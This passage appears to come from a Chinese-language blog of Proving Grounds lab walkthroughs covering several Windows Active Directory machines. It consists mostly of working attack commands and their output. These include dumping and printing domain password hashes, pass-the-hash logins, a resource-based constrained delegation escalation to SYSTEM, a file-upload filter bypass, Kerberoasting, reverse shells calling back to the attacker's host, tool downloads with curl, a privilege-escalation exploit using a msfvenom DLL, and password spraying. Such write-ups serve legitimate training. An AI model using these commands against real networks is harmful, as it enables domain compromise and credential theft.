[WORKGROUP\\V.Ventz]:\nTry \"help\" to get a list of possible commands.\nsmb: \\> ls\n  .                                   D        0  Tue Oct  5 04:49:16 2021\n  ..                                  D        0  Tue Oct  5 04:49:16 2021\n  Active Directory                    D        0  Tue Oct  5 04:49:15 2021\n  registry                            D        0  Tue Oct  5 04:49:16 2021\nc\n                7706623 blocks of size 4096. 2718634 blocks available\nsmb: \\> cd registry\nsmb: \\registry\\> ls\n  .                                   D        0  Tue Oct  5 04:49:16 2021\n  ..                                  D        0  Tue Oct  5 04:49:16 2021\n  SECURITY                            A    65536  Mon Sep 27 06:45:20 2021\n  SYSTEM                              A 16777216  Mon Sep 27 06:45:20 2021\n\n                7706623 blocks of size 4096. 2718634 blocks available\nsmb: \\registry\\> \n---\n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ smbclient \/\/192.168.104.175\/Password\\ Audit -U V.Ventz\n\nPassword for [WORKGROUP\\V.Ventz]:\nTry \"help\" to get a list of possible commands.\nsmb: \\> ls\n  .                                   D        0  Tue Oct  5 04:49:16 2021\n  ..                                  D        0  Tue Oct  5 04:49:16 2021\n  Active Directory                    D        0  Tue Oct  5 04:49:15 2021\n  registry                            D        0  Tue Oct  5 04:49:16 2021\n\n                7706623 blocks of size 4096. 2718618 blocks available\nsmb: \\> cd \"Active Directory\"\nsmb: \\Active Directory\\> ls\n  .                                   D        0  Tue Oct  5 04:49:16 2021\n  ..                                  D        0  Tue Oct  5 04:49:16 2021\n  ntds.dit                            A 25165824  Mon Sep 27 07:30:54 2021\n  ntds.jfm                            A    16384  Mon Sep 27 07:30:54 2021\n\n                7706623 blocks of size 4096. 2718570 blocks available\nsmb: \\Active Directory\\><\/code><\/pre>\n\n\n\n
\u4f7f\u7528 secretdump \uff0c\u52a0\u4e0a nxc \u53bb\u505a users \u8ddf hash \u7684 spray\uff0c\u6700\u5f8c\u53ea\u6709\u4e00\u500b\u65b0\u7684 user L.Livingstone hash \u662f\u53ef\u7528\u7684<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d\n[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\n[*] Searching for pekList, be patient\n[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94\n[*] Reading and decrypting hashes from ntds.dit \nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nRESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::\nM.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::\nK.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::\nL.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::\nJ.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::\nV.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::\nS.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::\nP.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::\nR.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::\nD.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::\nG.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::\n\u7701\u7565\n---\n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ nxc smb 192.168.104.175 -u users -H hashes --continue-on-success | grep +\nSMB                      192.168.104.175 445    RESOURCEDC       [+] resourced.local\\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808\nSMB                      192.168.104.175 445    RESOURCEDC       [+] resourced.local\\V.Ventz:913c144caea1c0a936fd1ccb46929d3c<\/code><\/pre>\n\n\n\n
Initial Access <\/h3>\n\n\n\n
\u525b\u62ff\u5230\u7684 L.Livingstone \u7528 winrm PtH  \u9032\u53bb<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ evil-winrm -u 'L.Livingstone' -H '19a3a7550ce8c505c2d46b5e39d6f808' -i '192.168.104.175'\n                                        \nEvil-WinRM shell v3.7\n                                        \nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                                                                          \n                                        \nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n                                        \nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\L.Livingstone\\Documents> cd ..\/..\/\n*Evil-WinRM* PS C:\\Users> tree \/f \/A\nFolder PATH listing\nVolume serial number is 5C30-DCD7\nC:.\n+---Administrator\n+---L.Livingstone\n|   +---Desktop\n|   |       local.txt\n|   |\n|   +---Documents\n|   +---Downloads\n|   +---Favorites\n|   +---Links\n|   +---Music\n|   +---Pictures\n|   +---Saved Games\n|   \\---Videos\n\\---Public\n*Evil-WinRM* PS C:\\Users> <\/code><\/pre>\n\n\n\n
Privilege Escalation – RBCD attack<\/h3>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u5c0d DC \u7684 computer account \u6709 GenericAll\uff0c\u53ef\u4ee5\u5229\u7528 Resource-Based Constrained Delegation\u3002<\/p>\n\n\n\n
\u5148\u65b0\u589e\u4e00\u500b computer account ATTACKERSYSTEM$ \uff0c\u9019\u88e1\u4f7f\u7528 SAMR \uff0c LDAPS \u6709\u6191\u8b49\u554f\u984c<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ impacket-addcomputer -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host 192.168.182.175 -domain-netbios resourced 'resourced.local'\/'L.Livingstone' -hashes ':19a3a7550ce8c505c2d46b5e39d6f808'\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Successfully added machine account ATTACKERSYSTEM$ with password Summer2018!.<\/code><\/pre>\n\n\n\n
\u8a2d\u7f6e RBCD \u59d4\u6d3e\u6b0a\u9650\uff0c\u4fee\u6539 computer account RESOURCEDC$ \u7684 msDS-AllowedToActOnBehalfOfOtherIdentity \uff0c\u5141\u8a31 ATTACKERSYSTEM$ \u5c0dRESOURCEDC$ \u9032\u884c kerberos \u59d4\u6d3e<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'RESOURCEDC$' -action 'write' 'resourced.local'\/'L.Livingstone' -hashes ':19a3a7550ce8c505c2d46b5e39d6f808' -dc-ip 192.168.182.175       \nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty\n[*] Delegation rights modified successfully!\n[*] ATTACKERSYSTEM$ can now impersonate users on RESOURCEDC$ via S4U2Proxy\n[*] Accounts allowed to act on behalf of other identity:\n[*]     ATTACKERSYSTEM$   (S-1-5-21-537427935-490066102-1511301751-4101)<\/code><\/pre>\n\n\n\n
\u5229\u7528 RBCD \u6a5f\u5236\uff0c\u751f\u6210\u4e00\u500b\u507d\u88dd administrator \u7684 service ticket<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ impacket-getST -spn 'cifs\/ResourceDC.resourced.local' -impersonate 'administrator' 'resourced.local\/attackersystem$:Summer2018!' -dc-ip 192.168.182.175\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[-] CCache file is not found. Skipping...\n[*] Getting TGT for user\n[*] Impersonating administrator\n[*] Requesting S4U2self\n[*] Requesting S4U2Proxy\n[*] Saving ticket in administrator@cifs_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache<\/code><\/pre>\n\n\n\n
\u532f\u5165 serviec ticket\uff0c\u4e26\u8a2d\u5b9a \/etc\/hosts \u628a resourced.local ResourceDC.resourced.local \u90fd\u6307\u5411 DC ip<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ export KRB5CCNAME=$(pwd)\/'administrator@cifs_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache'\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ klist\nTicket cache: FILE:\/home\/kali\/oscp\/pg\/Resourced\/administrator@cifs_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache\nDefault principal: administrator@resourced.local\n\nValid starting       Expires              Service principal\n07\/12\/2025 05:17:53  07\/12\/2025 15:17:52  cifs\/ResourceDC.resourced.local@RESOURCED.LOCAL\n        renew until 07\/13\/2025 05:17:55\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ impacket-psexec resourced.local\/administrator@ResourceDC.resourced.local -k -no-pass\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Requesting shares on ResourceDC.resourced.local.....\n[*] Found writable share ADMIN$\n[*] Uploading file sgFVEzVn.exe\n[*] Opening SVCManager on ResourceDC.resourced.local.....\n[*] Creating service Eqac on ResourceDC.resourced.local.....\n[*] Starting service Eqac.....\n[!] Press help for extra shell commands\nMicrosoft Windows [Version 10.0.17763.2145]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32> whoami\nnt authority\\system\n\nC:\\Windows\\system32><\/code><\/pre>\n\n\n\n
Access<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.188.187<\/td>TCP:53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,47001<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Initial Access – file upload to rce <\/h3>\n\n\n\n
\u7db2\u7ad9 Buy Now \u6309\u9215\u9ede\u9078\u5f8c\u53ef\u4ee5\u4e0a\u50b3\u6a94\u6848\uff0c\u4e26\u4e14\u6703\u9650\u5236 php \u526f\u6a94\u540d\uff0c\u53c3\u8003 https:\/\/github.com\/fuzzdb-project\/fuzzdb\/blob\/master\/attack\/file-upload\/alt-extensions-php.txt \uff0c\u4f7f\u7528 .php……. \uff0c\u7e5e\u904e\u9650\u5236\u3002<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Access]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.187] 49854\ncd ~\nPS C:\\Users\\svc_apache> whoami \/priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                    State   \n============================= ============================== ========\nSeChangeNotifyPrivilege       Bypass traverse checking       Enabled \nSeCreateGlobalPrivilege       Create global objects          Enabled \nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled\nPS C:\\Users\\svc_apache> \n<\/code><\/pre>\n\n\n\n
\u76ee\u524d\u62ff\u5230\u7684 account svc_apache \u6b0a\u9650\u9084\u4e0d\u5920\u62ff\u5230 local.txt \uff0c\u7528 bloodhound \u5206\u6790\u67e5\u770b List all Kerberoastable Accounts \u767c\u73fe svc_mssql \u53ef\u4ee5\u5229\u7528<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u67e5\u770b\u7cfb\u7d71\u6240\u4f7f\u7528\u7684 .NET Framework version<\/p>\n\n\n\n
Get-ChildItem 'HKLM:\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP' -Recurse | Get-ItemProperty -Name version -EA 0 | Where { $_.PSChildName -Match '^(?!S)\\p{L}'} | Select PSChildName, version<\/code><\/pre>\n\n\n\n
\u4f7f\u7528\u76f8\u5c0d\u61c9\u7684 Rubeus.exe <\/a> \u4f86 Kerberoasting<\/p>\n\n\n\n
PS C:\\Users\\svc_apache> curl.exe 192.168.45.228:8000\/Rubeus.exe -o Rubeus.exe\nPS C:\\Users\\svc_apache> .\\Rubeus.exe kerberoast \/outfile:hashes.kerberoast\n\n   ______        _                      \n  (_____ \\      | |                     \n   _____) )_   _| |__  _____ _   _  ___ \n  |  __  \/| | | |  _ \\| ___ | | | |\/___)\n  | |  \\ \\| |_| | |_) ) ____| |_| |___ |\n  |_|   |_|____\/|____\/|_____)____\/(___\/\n\n  v2.2.0 \n\n\n[*] Action: Kerberoasting\n\n[*] NOTICE: AES hashes will be returned for AES-enabled accounts.\n[*]         Use \/ticket:X or \/tgtdeleg to force RC4_HMAC for these accounts.\n\n[*] Target Domain          : access.offsec\n[*] Searching path 'LDAP:\/\/SERVER.access.offsec\/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'\n\n[*] Total kerberoastable users : 1\n\n\n[*] SamAccountName         : svc_mssql\n[*] DistinguishedName      : CN=MSSQL,CN=Users,DC=access,DC=offsec\n[*] ServicePrincipalName   : MSSQLSvc\/DC.access.offsec\n[*] PwdLastSet             : 5\/21\/2022 5:33:45 AM\n[*] Supported ETypes       : RC4_HMAC_DEFAULT\n[*] Hash written to C:\\Users\\svc_apache\\hashes.kerberoast\n\n[*] Roasted hashes written to : C:\\Users\\svc_apache\\hashes.kerberoast\nPS C:\\Users\\svc_apache> type hashes.kerberoast\n$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc\/DC.access.offsec@access.offsec*$7D20B8C3CCC8CBF96B9A9C24E25B5D61$B9D56D5BE792350B928D7C28836B4F944968C9D79653B125F3F3C31EE6A42526CD08B5D5D5B6430D31F8326A58A747BDF9D5200CE5422ED77BC191119A3A4F791D590F2F81A177AB9E93376FBA2B6735BEC857FD295EB1EA2D66E8103473573EEBCB4D74E5B87D0A399B1F5F90D8DFF86C86579114E41B81F4BC6FFBA5BF0BE308501C4742D0D3C9068BFA71B6C41BBEA0829262B57A28F5B772D5AFE9CE43452E73347A87FD3435130DDAEC4E197E3B000C0689D3E3EBBAD19AC68F39A2B3756102176E6597514E64383931BC1327FE0E749015678D3CC117AF8C6F9EBA170EA0DD6D5B5F0521427B2BED1E64CA8532B0031697350ABD533DAF0E2725C7EAACAFA32598766D177BD3BF2E0AEF9FD4125756E3B35CF1E8C0323846F9EF1FB431995172DC22B696F3AA67B02FEF58CE06D9DBF87E4348920CC3C70440106A1274CC94958F1E6B6E2F17CA789CB830E2BBA392E79E3E8B067B853D4DFC66F6EDB717EBF0051CC87B918C7DB83E33AA7736C79409CE13B904EDC5840F8AEC4B856D6A74065F2EC45D7309186260709D89F7C1E13908873C93BBF4F82F89621FE2F643A339658B691E2EFE3ABE6923C771C2D9A52F8078E1A864E531649419B91383420E83B77C53378C2E00134F5FADF4496008EA4736C264CE67CCDAC83A3B8687816032B778E55B6A33B60927A8045E3365B9000599141DFE419C0A4BA095FC7E74DB3F228D7D5DE8986338D1663DC300A9204E9019FAF98F4BC692F8ECC1054C3E023D6D589287B1F9C4EDEFD7AD74E30BDEF1518AD577446B932026CD6F05B023EE68602E9BD40E86D90A8A9E23E0FF236CAD53A386CE05A06B376F79DEA4C7D8C20C62289A16A3AE9A6369440E58820F0581355822806A45F65B80EF6943A408F69709A767A403CE6DE0E297FA2E522F429BF6E90B606D656866E9E63E1934F6053827EE475DCF72CD2A8539BB15E45A0A94736FB23BA1425394F318A998B96F64A45ED75F45186E8AF836D93BD4BC4EBB4A8AB4F161BA528F94DDF8EF5339D084248A6A641CEAEA73D354DABC1120EA12C1356242824440AF86EA39D79AE66E64E6521D510B532460CAE78566FD35481E74870D697D37433843DBA076554278CA3FFBEE69638A6523FE6E31EAE6CE4FBF73669DF790D3EC7F3D21A4C5B284649FAFDBD76ACA371133D76D7B3857B5753AE5B83DF858E3FA543E4285ED8B5F038ACC9586BBEB2ECC0648CAD2A0FF2586A20CA4DEC0CABE301829593F80987153AA5A05E179DC07B833E70EF5527DDB0FFAA1B52F2B0B0FD6294BA09A71069A6721AC05B396258E991A1826BB08E2808F0B0CA5CE6225396BE98BA92D776D436D00E42D20DCCA81623E2DDE772CCC26275D5DCDBC8BD4B4F9346C776E1ED1F185F3110C9D6CA7B3B89624C8B43CCD60C5BB23C5474C360FA276A510EE58DB26FD3F373347B45F76F3AE694B411C2AFC152DC46C2A956AF806147D9AEF5F3F5EC19B0AB99E4B53C40A0AF06DEC458D4F9160C495851AD0A05ADB5B24ADD9928EA9E9727932D13A4C173B0F7CD753A669E42851E1EBD3F0464185160FCC1E0BEE141CCF184641E6EFF945517BE2E2BED8B452\nPS C:\\Users\\svc_apache> <\/code><\/pre>\n\n\n\n
\u7834\u89e3 hash \u5f97\u5230 svc_mssql \u5bc6\u78bc\u70ba trustno1 \uff0c\u4e26\u4f7f\u7528 RunasCs.exe \u5df2 svc_mssql \u7684\u8eab\u5206\u8dd1\u4e00\u500b reverseshell <\/p>\n\n\n\n
PS C:\\Users\\svc_apache> curl.exe 192.168.45.228:8000\/RunasCs.exe -o RunasCs.exe\nPS C:\\Users\\svc_apache> .\\RunasCs.exe\n[-] Not enough arguments. 3 Arguments required. Use --help for additional help.\nPS C:\\Users\\svc_apache> .\\RunasCs.exe svc_mssql trustno1 cmd -r 192.168.45.228:8787\n[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.\n\n[+] Running in session 0 with process function CreateProcessWithLogonW()\n[+] Using Station\\Desktop: Service-0x0-45f4f$\\Default\n[+] Async process 'C:\\Windows\\system32\\cmd.exe' with pid 1216 created in background.\nPS C:\\Users\\svc_apache> <\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Access]\n\u2514\u2500$ rlwrap nc -lvnp 8787\nlistening on [any] 8787 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.187] 50076\nMicrosoft Windows [Version 10.0.17763.2746]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>whoami\nwhoami\naccess\\svc_mssql\n\nC:\\Windows\\system32>type c:\\users\\svc_mssql\\desktop\\local.txt\ntype c:\\users\\svc_mssql\\desktop\\local.txt\n3a7f47eb0838c8ddfdc5339eade9cb53<\/code><\/pre>\n\n\n\n
Privilege Escalation – SeManageVolumePrivilege<\/h3>\n\n\n\n
\u5229\u7528 SeManageVolumePrivilege \u6b0a\u9650 \uff0c\u4f7f\u7528 SeManageVolumeExploit.exe<\/a> \uff0c\u642d\u914d \u9019\u7bc7<\/a> \u8aaa\u660e \uff0c\u5148\u57f7\u884c exe \uff0c\u6709\u6b0a\u9650\u5728 C:\\Windows\\System32\\wbem> \u65b0\u589e tzres.dll \uff0c\u5176\u4e2d tzres.dll \u662f\u7528 msfvenom \u751f\u6210\u7684 revshell dll <\/p>\n\n\n\n
C:\\Windows\\Temp>curl.exe 192.168.45.228:8000\/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe\ncurl.exe 192.168.45.228:8000\/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100 12288  100 12288    0     0  74539      0 --:--:-- --:--:-- --:--:-- 75851\n\nC:\\Windows\\Temp>.\\SeManageVolumeExploit.exe\n.\\SeManageVolumeExploit.exe\nEntries changed: 918\nDONE \n\nC:\\Windows\\Temp>cd C:\\Windows\\System32\\wbem\\\ncd C:\\Windows\\System32\\wbem\\\n\nPS C:\\Windows\\System32\\wbem> curl.exe 192.168.45.228:8000\/tzres.dll -o tzres.dll\ncurl.exe 192.168.45.228:8000\/tzres.dll -o tzres.dll\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100  9216  100  9216    0     0  59921      0 --:--:-- --:--:-- --:--:-- 60235\nPS C:\\Windows\\System32\\wbem> systeminfo\nsysteminfo\nERROR: The remote procedure call failed.\nPS C:\\Windows\\System32\\wbem> <\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Access]\n\u2514\u2500$ rlwrap nc -lvnp 6969\nlistening on [any] 6969 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.187] 50285\nMicrosoft Windows [Version 10.0.17763.2746]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>whoami\nwhoami\nnt authority\\network service\n\nC:\\Windows\\system32>type c:\\users\\administrator\\desktop\\proof.txt\ntype c:\\users\\administrator\\desktop\\proof.txt\n6c199b9598708291f3d96acaf7de1a60\n\nC:\\Windows\\system32>\n<\/code><\/pre>\n\n\n\n
hokkaido<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.217.40<\/strong><\/strong><\/strong><\/strong><\/td>TCP:53,80,88,135,139,389,445464,593,636,1433,3268,3269,3389,5985,8530,8531,9389,47001<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
SMB enumeration<\/strong><\/p>\n\n\n\n
\u4f7f\u7528\u5047\u5b9a\u5916\u6d29\u7d66\u7684\u5e33\u865f info\/info \uff0c\u5176\u4e2d\u5728 NETLOGON\/temp \u5e95\u4e0b\u6709\u4e00\u500b password_reset.txt \u767c\u73fe\u5bc6\u78bc Start123!<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ smbclient \/\/192.168.217.40\/NETLOGON -U info\nPassword for [WORKGROUP\\info]:\nTry \"help\" to get a list of possible commands.\nsmb: \\> dir\n  .                                   D        0  Sat Nov 25 08:40:08 2023\n  ..                                  D        0  Sat Nov 25 08:17:33 2023\n  temp                                D        0  Wed Dec  6 10:44:26 2023\n\n                7699711 blocks of size 4096. 1920233 blocks available\nsmb: \\> cd temp\nsmb: \\temp\\> ls\n  .                                   D        0  Wed Dec  6 10:44:26 2023\n  ..                                  D        0  Sat Nov 25 08:40:08 2023\n  password_reset.txt                  A       27  Sat Nov 25 08:40:29 2023\nm\n                7699711 blocks of size 4096. 1920233 blocks available\nsmb: \\temp\\> more password_reset.txt\n\n---\nInitial Password: Start123!\n\/tmp\/smbmore.nhOD14 (END)<\/code><\/pre>\n\n\n\n
\u4f7f\u7528 nxc \u6536\u96c6 domain \u4e0a\u7684 users\uff0c\u4e26\u4e14 password spraying \u627e\u5230 discovery:Start123!<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ nxc smb 192.168.217.40 -u info -p info --users-export users\nSMB         192.168.217.40  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)\nSMB         192.168.217.40  445    DC               [+] hokkaido-aerospace.com\\info:info \nSMB         192.168.217.40  445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-  \nSMB         192.168.217.40  445    DC               Administrator                 2023-12-06 15:56:28 0       Built-in account for administering the computer\/domain                                                                                      \nSMB         192.168.217.40  445    DC               Guest                         <never>             0       Built-in account for guest access to the computer\/domain                                                                                    \nSMB         192.168.217.40  445    DC               krbtgt                        2023-11-25 13:11:55 0       Key Distribution Center Service Account                                                                                                     \nSMB         192.168.217.40  445    DC               Hazel.Green                   2023-12-06 16:34:46 0        \nSMB         192.168.217.40  445    DC               Molly.Smith                   2023-11-25 13:34:13 0        \nSMB         192.168.217.40  445    DC               Alexandra.Little              2023-11-25 13:34:13 0        \nSMB         192.168.217.40  445    DC               Victor.Kelly                  2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Catherine.Knight              2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Angela.Davies                 2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Molly.Edwards                 2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Tracy.Wood                    2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Lynne.Tyler                   2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Charlene.Wallace              2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Cheryl.Singh                  2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Sian.Gordon                   2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Gordon.Brown                  2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Irene.Dean                    2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Anthony.Anderson              2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Julian.Davies                 2023-11-25 13:34:17 0        \nSMB         192.168.217.40  445    DC               Hannah.O'Neill                2023-11-25 13:34:18 0        \nSMB         192.168.217.40  445    DC               Rachel.Jones                  2023-11-25 13:34:18 0        \nSMB         192.168.217.40  445    DC               Declan.Woodward               2023-11-25 13:34:18 0        \nSMB         192.168.217.40  445    DC               Annette.Buckley               2023-11-25 13:34:18 0        \nSMB         192.168.217.40  445    DC               Elliott.Jones                 2023-11-25 13:34:18 0        \nSMB         192.168.217.40  445    DC               Grace.Lees                    2023-11-25 13:34:18 0        \nSMB         192.168.217.40  445    DC               Deborah.Francis               2023-11-25 13:34:18 0        \nSMB         192.168.217.40  445    DC               Bruce.Cartwright              2023-11-25 13:34:21 0        \nSMB         192.168.217.40  445    DC               Nigel.Brown                   2023-11-25 13:34:21 0        \nSMB         192.168.217.40  445    DC               Derek.Wyatt                   2023-11-25 13:34:21 0        \nSMB         192.168.217.40  445    DC               discovery                     2023-12-06 15:42:56 0        \nSMB         192.168.217.40  445    DC               maintenance                   2023-11-25 13:39:04 0        \nSMB         192.168.217.40  445    DC               hrapp-service                 2023-11-25 14:14:40 0        \nSMB         192.168.217.40  445    DC               info                          2023-12-06 15:43:50 0        \nSMB         192.168.217.40  445    DC               [*] Enumerated 33 local users: HAERO\nSMB         192.168.217.40  445    DC               [*] Writing 33 local users to users<\/code><\/pre>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ nxc smb 192.168.217.40 -u users -p Start123! | grep +\nSMB         192.168.217.40  445    DC               [+] hokkaido-aerospace.com\\discovery:Start123! <\/code><\/pre>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u5728bloodhound \u4e2d\u53ef\u4ee5\u770b\u5230\u525b\u525b\u62ff\u5230\u7684 account DISCOVERY@HOKKAIDO-AEROSPACE.COM \u662f service group \u7684\u4e00\u90e8\u5206<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u5617\u8a66\u4f7f\u7528 mssql \uff0c\u767c\u73fe\u9019\u7d44\u9019\u865f\u53ef\u4ee5\u4f7f\u7528\u8a72\u670d\u52d9<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/hokkaido]\n\u2514\u2500$ nxc mssql '192.168.217.40' -u 'discovery' -p 'Start123!'             \nMSSQL       192.168.217.40  1433   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)\nMSSQL       192.168.217.40  1433   DC               [+] hokkaido-aerospace.com\\discovery:Start123! \n<\/code><\/pre>\n\n\n\n
\u767b\u5165\u5f8c\u767c\u73fe\u6c92\u6709\u6b0a\u9650\u8b80\u53d6\u5176\u4ed6\u8cc7\u6599\u5eab\uff0c\u4e5f\u6c92\u8fa6\u6cd5\u57f7\u884c shell \u7b49\u7b49\u3002\u7528 nxc \u6aa2\u67e5\u767c\u73fe\u53ef\u4ee5 impersonate \u7684\u7528\u6236\uff0c\u4e26\u53d6\u5f97\u4e00\u7d44 credential<\/p>\n\n\n\n
